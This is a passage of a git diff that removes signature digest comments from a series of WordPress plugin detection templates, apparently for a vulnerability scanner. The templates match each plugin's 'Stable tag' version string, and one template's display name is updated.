b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cba781039c22f41e713116c83f4ef540267648ffc1941604d100b6460d155f25022100a54ad7e4531d2f685faaa31197eb1aac01a1db8f5a7f6f6af038a110fa5f0a17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 8cfa2f63ee..7e71b4736f 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022028908df64d13e5d125206ac465c211ea5d646911950b9ee54dfb1c394e1181bf02207c695ee1849d0186b027fa1ff263a43c5d1becfa44ab6f6b65dcd0978f0ef09d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index ba6cd4401e..88a70b2478 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c2ff2e50a1ab629c5c8fccc749a4a45779fc2fac72fb3456625d1632d36760fe022034f2adc59f2f061fba5c4a29ede80a17c505eace40adf537ab740b2799d3311f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 4a837ba8e6..fc498e67e6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207be1adf4a5e154a19a5dfdbccc98b8ee137e1fc2ec988153ce37fb9eea23e838022100ff82f689beece49e3b10d440b4dfd1b4682c3e6b8fdb30c49029bc8e81159dbc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index a42057f774..465aa93d57 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202d4c9ddb785129cf61fcb504ac2538176b3186ccdd47be66d5e87b63662d32ff0220680519ea7db205ec60b991d7b504c5cd94e64dcaa02889bfa738520594033cea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 3f076d71e4..2a1b0e57a9 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100865e5032bedc59d29b10c3c541c9fcc4d0dda7d92cfd2f50585b96cac046a064022100d27168155421caeae7974d498478173cf4558216795509761c2876402d68785b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 3acb8b1f06..df35e8b415 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205244cecd15814731962766d6f62c64eb754bf78b4ddbd70b8cb6e2fd8a54d67202203842035c4a56ba05e9c3434923757b67220e6da38e3b75bc8c2432031c2db039:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 9c488619c7..033cc4bc3d 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100db799abb7c2e1e7cd3dadf01275e556fdab49e567d04bbb6b254eaad9fc113f502207042a0bf1df538fb071dad8a2bfe30ef41782ef1a78e0ea036589f9be48ae19d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluent-smtp.yaml b/http/technologies/wordpress/plugins/fluent-smtp.yaml index aeed8920a5..4a3dcbd210 100644 --- a/http/technologies/wordpress/plugins/fluent-smtp.yaml +++ b/http/technologies/wordpress/plugins/fluent-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220719ffa2a7aca8fe57c0051eddba61eaa253fe371d7dad7ec5b57b3718a9fa309022062dda36595fdbab931b07e88076e0e50a8733b511f5cde7172ba79e576a7e1e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index ed1d901a27..945ab6ad03 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220420c6ec2d6cf1c5c634f9f749d917ea10de98f22490682087308b1f3b9b5cec902210093e3bf5a99e70f3eedcabbffc8e882f75548489087f0d84d1fc2abc023dc7544:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 9eeba8af9d..2072b51ab9 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210095a6d9af790972ba2807a3b0c58d8ef28bd972f704ba2ba11bd196ea9f0e26ae022100f3f30ee49985e9683d60ae68ee2903799104da1d2eb60a26cc4f0bc74d2ca93d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 39a1a332d0..b509d8cc67 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022040a7612590080426e9af9d776cbb18d386530fe2dcef8f802d947b556a13f4f202206ad5e7af5b1f2dfc2e0e688118e5b70850add62abf1beebe1f522b0b1bc4fd0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 90e70a4ee7..c984479bde 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e7a8853d556a942ce4e058925d5fb8161cbaa706ccfcff35b4fa6d5b29ecd2e5022100c25c503ebdf1466a898fdb195e40f9b4710e0c53f82b4c2c4f14d37b6c409a62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 74f828d1ce..a3870175c7 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f05dbe26e23b4276654e5b86a0339d0340095a8358cfaba64fecccfdc0d0c2d50220728b0effcc95b87b57c3e2fe31caa2f5b1a2cb879c484e4ba7a4382e822491d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 3416043f79..f5f3818ea2 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008e721bf2bf97f3c15a4bc84ff4a15737175f0356e200d12db1cecc3fffa28bc70221009432e8c4fe3711a27ea56825165f3d21d22bc096e37de2618095e82372cf90f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 78bdab58ba..7e5b54c12c 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220698db8e76bc40e03debce6b3fbba5fa5cad53f49a752c54bd0d10675959444a302200df373f653a0577f25f4185644b853afccad0a3504a92a63a628a566b83ab5a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index bcea1ef612..59effd09f6 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008a7d10893986de2958063163b1ab8a92d3f2a6c661d75952237ee1ffebb6ab77022100bf23eb30925a20da19715c6d2b33983fc5e43245e3abd316d5387adec0a7e18c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index fcba944a17..833207dcff 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022062de9dc4000d52aec452c3677460b1227eea52114aa05dfa9da6ce3466d2ec27022100e6982ef37fdefc602580575d64d9b01e78e8c239c96cab76b57c17cb5c1cd629:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 15a2337499..b7ea2d38d1 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203e71ed8c6317a30d8b89f8e5a412bcfe73b0424a8b74c48bc7af681c5ee5a1dd022100e8d3343b47b6a14039c47648253d543ecaae48bd84cc4e7f939b2f49af1de64f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index ae953396da..2131dbe751 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204cfe6a9402f7f884e905f76490378cec6f3dbbb9291596eed47574cddbad511a02210086f05086f76f6c25cb091b648008db50b151fa090d620456d883463825123374:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 93e73a785f..73d644c5e4 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206c16487464c5c9c01b954638defd0280e65292c9de4520891d019bb6476b49da02201f2c8b7cd3fd910e167f6b7b5533bee8a745fc556c43c3c3093af3f8c4f2c1a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index c23218da9e..7b0593dcb7 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f7be0513214a48681afd3c65ee461b90639e4890d7201dbbc39f6684b78c47a2022047a69093f6b2f1a9cfb4e15890fdb2c80ba303943f8c8442914b4110802cb3bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 7fdcddd3a8..6f65d087e4 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008e15818f92162a1e3b86ec98c4d894d3da95141b8daf0c2d40521a464dee293802210097bb24dc58254a87d4465ab10b53d49822ebe7b683fa21be02082a26f9241939:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index c667b97ffe..783cdd283d 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022079d0d3618efff8eb75c3a339ac2efdca7d12801aea463090c89d982e84ab616902201cfc957c29d02ff6e468b463161ae8caf5123c40296d0a9eaed1fc854da1a505:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index ca02178a0f..05121854b3 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202d55f2b59c1381d955741591ba5476aeaf4a58c640f2d2d17f1d3e2bddea50d7022012540101012e0127beb51990a96a7f4a603d25e50e5b567f5b50eabc42c6620d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index f9d9d1ffbe..72f52edcd4 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022066c6baafe4487fc7506a70b678bfcb5ed4a13fcbfa8fd92b16148e626605f88702210085fe83e80a7350588c56d5be83fdaf7b81846d8273404dcb4a0321c2353447f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 738c6799b9..4cf45ebd74 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d6dcb47098f57becab0253d1de39526742a01a6bb8532f763c626b0befd9c35c022100df459fa303f3045fd2dd15dedbbba24c017d258ec928c65bbe2184b40729ec57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index a9ba8fa30a..3d6863e074 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c7d2d588a049961aa26b2fb001d68d39adb77716c0a53bb3f1c6b4ac7e6f5b5b022068df10da1a95290525d570a61c4833b1310409aa1785bd6c6c0cdf423783883b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 78b1d8c1b0..79e2813c5e 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b82a3c7302845e5c8a6c1e0c222fee82b7839bb0ef77c2f03a03ca46e6835562022100f3989459e66ed28802742ce9ffeab76683db7b00866f5e898e646406552d2387:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index 372df25a94..ab9a0f1ae3 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022043d260d6701acf276c826e9727ffb6c0c708b5bec5633ebdba781f4283e7b7ca022100d8e299d53f03127ba5e7322698deff5d07dcaf05fded73f54fea075dd5a40938:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index eccee81d31..5d3adf7c27 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cd1e812223a8204a0d3f4d034dff04de7c4a830739fbfabb2d094f5b6aeb2cac02204278d107483917f964cc2c608ba1d4a4f7c049f21800dc872b44abca57a41628:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index f066dbc263..fea9594fa0 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -1,7 +1,7 @@ id: wordpress-image-optimization info: - name: Image Optimizer by Elementor – Compress, Resize and Optimize Images Detection + name: Image Optimizer by Elementor – Optimize Images and Convert to WebP or AVIF Detection author: ricardomaia severity: info reference: @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203908921dd63f0c3b8b0b052095c51501068f6aaafee3256afee15c534d2f2a2d02204338900b43ba862f4afda5783f1d35b2c23ef1a53336a88113765a9e05389675:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 04ef26e344..16dfc8df5f 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100970f90c26de651cfbb0e0bed51fa8278d201794323baa7727246d86f8f6503430220047b7c0a393496bae33d59a894728b056a23e0f82d7aee680f62a0322e72dcae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 06aef02b50..4b7600ea69 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cbab21ca57b50a62339be9bc6b67171f45365c404e85d48cbff787465f66b669022100dee9f7872098e57881c1b6943c572ce2c198babb76a77c806d9e5797ab6bf929:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index b33a785120..2ccd4dbce8 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b756950fb56eb15221139529dde4c861003db5b2075a08d990145ca80d95d76a022100a422fe4c06a0ac02bf8c8fb2c9ad16cedaa82cb37b94c0c858577d319041c4e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 2ad4c35356..02ceb224d1 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009df9789f1b555a8714fb9a7c768d5b3e6fae38ff45cd8f8b13f5257999851f6002204fe7592a17ea4aee011b658d930a3c18935a0f18547ad7d68674e107876ce987:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 53ea716abc..367d587ce2 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100994efcbb37ce1c2de94f63005e85ab48bc863ca77d36b6ef6037bbe54339ceb00220697af6739380be4e640ecb6ea889003801c6dabf937f07cc87185c11a08b3bf9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 79aa87d5cc..feed730ee0 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008bd9d821845cab18ea9958071ed577bac944f3ea14a6b442fc4e0355b15ebdfe0221009b38377f12639cc62d78687c843f608a75640307a899f71ff0fb33ada9495904:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 8b83097f11..9b2841e7ca 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200f062c8c21d801b6e458f810f6a23c5b284758c064a803298b4e16db69a2e826022100839b37f77221148ba032b120d0ac72e21f0fb6ed3d56093c3a2784eeeb802968:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 2a36057c4e..42be14c5df 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100feccfe7deaa6ef67cbfc26f8d69cb10acd579d0e3c7fe8c30fb780c0754fa56b022024403b5d90b0945fa875b715d4f72c39e4f3da59a67598a70fb79b1c15ec171f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 470c152e5d..4e0cd86c3f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ec5d9fd9c984d29e05cce71bbab8b064f8b04e2527deb81d63b45d4dae1a1a0602202113477c99822825a17bd7f730e7ebb799ab7374ae5145ce2ae1e5a37093aca2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 0374746363..59eadc5e6e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100eaa110d046cc84ca2d10f22b8fb398e3036adb436617794d0c15777d42bcbc55022100e275507af9b6aaa03620f369625dc194347af7256d06bdb44db86e28c676c551:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 47b413eed1..41f7a0075e 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022028b8ca74677a8dfb79e0a2aa0d35503dd49bcdf1a5700cde3d0d25ff5fbde8e1022068a51322766afe60f514fb7e0ec62163cf01d1b045fe774231ea8785b1e754f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index d050a4758d..7e35a3fb4f 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d9b2b4aa04dfd899677bc62b2f4e614ce2e78b04c7906b47d1dbcab8d5589094022100bfb23e6c0ae40f07bd35cb1ed0b2b897ae57729b01a1b5da3181644e74d4a5d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index e2c3e31121..18c2a7586e 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022028aa5323bcfc5e895237265b9ef8cccd744cf8bc6b81387d12a5d477c9fb30bb022100b20ed07be9e67afc9ef9914f532885ffc9d77e5a422db16d0959711f2c35cf9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 933c9a58cc..6bc2aa78f9 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d72511317c0d8f0a10c122bc0eff86a4dd6fefc85c5d28b659aee51dfba1071d022100b50687b2ac0b44ed0fb132e75eb9879f6bcd93d18d71acf4da46bb5c51874346:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 0254a51c3f..a43d3352a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f3c54ae5c5318e8210ee141f2e73021e3adf2a8a5705ce2b5ff18c392d0d748a022100f165a1d934aa4f785e508f486a7700c17300674114e770c8014b0bf061b7e5bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 